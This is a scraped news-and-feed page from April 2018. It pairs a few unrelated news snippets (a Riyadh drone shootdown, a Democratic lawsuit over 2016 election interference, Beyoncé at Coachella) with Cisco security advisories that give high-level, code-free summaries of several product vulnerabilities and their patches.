DUBAI/RIYADH (Reuters) - Saudi Arabian security forces said they had shot down a recreational drone in the capital on Saturday after online videos showing gunfire in a neighborhood where royal palaces are located sparked fears of possible political unrest. The Riyadh police spokesman, quoted by the official Saudi News Agency (SPA), said a security screening point noticed the flying of a small unauthorized recreational drone at 7:50 p.m. local time (1650 GMT), leading security forces to deal with it according to their orders and instructions. There were no casualties, and King Salman was not at his palace at the time, a senior Saudi official told Reuters.


 Sat, 21 Apr 2018 13:52:23 -0400 Dems' lawsuit alleges conspiracy between Trump camp, Russia

Dems' lawsuit alleges conspiracy between Trump camp, Russia

NEW YORK (AP) — A lawsuit by the Democratic Party accuses Donald Trump's presidential campaign, Russia, WikiLeaks and Trump's son and son-in-law of engaging in a conspiracy to undercut Democrats in the 2016 election by stealing tens of thousands of emails and documents.


 Mon, 23 Apr 2018 08:19:11 -0400 Beyoncé Falls On Stage At Coachella, May Possibly Still Be Human

Beyoncé Falls On Stage At Coachella, May Possibly Still Be Human

Beyonce took the stage again at Coachella in Indio, California, over the



Cisco Security Advisory
last updated: Mon, 23 Apr 2018 14:45:05 GMT

 Fri, 20 Apr 2018 12:43:39 CDT Cisco Adaptive Security Appliance WebVPN Cross-Site Scripting Vulnerability
A vulnerability in the Login screen of the Clientless SSL VPN (WebVPN) portal of Cisco Adaptive Security Appliance (ASA) Software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device.

The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or allow the attacker to access sensitive browser-based information.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-asawvpn
Security Impact Rating: Medium
CVE: CVE-2018-0242
 Fri, 20 Apr 2018 12:43:38 CDT Cisco ASA Software, FTD Software, and AnyConnect Secure Mobility Client SAML Authentication Session Fixation Vulnerability
A vulnerability in the implementation of Security Assertion Markup Language (SAML) Single Sign-On (SSO) authentication for Cisco AnyConnect Secure Mobility Client for Desktop Platforms, Cisco Adaptive Security Appliance (ASA) Software, and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software. The authentication would need to be done by an unsuspecting third party.

The vulnerability exists because there is no mechanism for the ASA or FTD Software to detect that the authentication request originates from the AnyConnect client directly. An attacker could exploit this vulnerability by persuading a user to click a crafted link and authenticating using the company's Identity Provider (IdP). A successful exploit could allow the attacker to hijack a valid authentication token and use that to establish an authenticated AnyConnect session through an affected device running ASA or FTD Software.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-asaanyconnect
Security Impact Rating: High
CVE: CVE-2018-0229
 Thu, 19 Apr 2018 21:07:10 CDT Cisco WebEx Clients Remote Code Execution Vulnerability
A vulnerability in Cisco WebEx Business Suite clients, Cisco WebEx Meetings, and Cisco WebEx Meetings Server could allow an authenticated, remote attacker to execute arbitrary code on a targeted system.

The vulnerability is due to insufficient input validation by the Cisco WebEx clients. An attacker could exploit this vulnerability by providing meeting attendees with a malicious Flash (.swf) file via the file-sharing capabilities of the client. Exploitation of this vulnerability could allow arbitrary code execution on the system of a targeted user.

Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-wbs
Security Impact Rating: Critical
CVE: CVE-2018-0112
 Wed, 18 Apr 2018 16:00:00 CDT Cisco MATE Collector Cross-Site Request Forgery Vulnerability
A vulnerability in the web-based management interface of Cisco MATE Collector could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack and perform arbitrary actions on an affected device.

The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user of the interface to follow a malicious link. A successful exploit could allow the attacker to perform arbitrary actions on a targeted device via a web browser and with the privileges of the user.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-MATE
Security Impact Rating: Medium
CVE: CVE-2018-0259
 Wed, 18 Apr 2018 16:00:00 CDT Cisco Wireless LAN Controller Default Simple Network Management Protocol Community Strings
With new installations of Cisco Wireless LAN Controller Software, the installation scripts create default community strings for Simple Network Management Protocol (SNMP) Version 2 (SNMPv2) and default usernames for SNMP Version 3 (SNMPv3), both allowing for read and write access.

As documented in the Cisco Wireless LAN Controller Configuration Best Practices guide, the SNMP configuration should either be changed or disabled depending on the environmental requirements. If the default community strings and usernames are not changed or disabled, the system is open for read and write access through SNMP.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180418-wlc
Security Impact Rating: Informational
